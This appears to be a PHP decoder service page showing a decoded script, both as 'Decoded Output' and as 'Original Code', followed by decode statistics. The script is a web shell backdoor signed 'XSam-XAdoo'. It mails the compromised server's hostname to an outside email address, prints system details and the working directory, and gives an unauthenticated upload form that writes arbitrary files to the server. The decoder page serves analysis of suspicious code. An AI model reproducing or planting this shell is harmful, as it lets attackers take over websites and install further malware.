Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $local_key2 = $_SERVER['HTTP_HOST']; $xx = rand(); mail('xsam.xadoo.2017@hotmai..

Decoded Output download

<?php   
$local_key2 = $_SERVER['HTTP_HOST']; 
$xx = rand(); 
mail('[email protected]',"Result Report Test - ".$xx,"WORKING ! $local_key2"); 
echo 'PRIVET BOT BY XSam-XAdoo'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd(); Echo '<center>  <form method="post" target="_self" enctype="multipart/form-data">  <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" />  </form>  </center></td></tr> </table><br>'; if (!empty ($_FILES['uploads'])) {     move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);     Echo "<script>alert('upload Done'); 	 	 </script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type']; } ?> 
  
 

Did this file decode correctly?

Original Code

<?php  
$local_key2 = $_SERVER['HTTP_HOST'];
$xx = rand();
mail('[email protected]',"Result Report Test - ".$xx,"WORKING ! $local_key2");
echo 'PRIVET BOT BY XSam-XAdoo'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd(); Echo '<center>  <form method="post" target="_self" enctype="multipart/form-data">  <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" />  </form>  </center></td></tr> </table><br>'; if (!empty ($_FILES['uploads'])) {     move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);     Echo "<script>alert('upload Done'); 	 	 </script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type']; } ?>
 

Function Calls

rand 1

Variables

$local_key2 None

Stats

MD5 883ea8a4961a88e84877319519000300
Eval Count 0
Decode Time 103 ms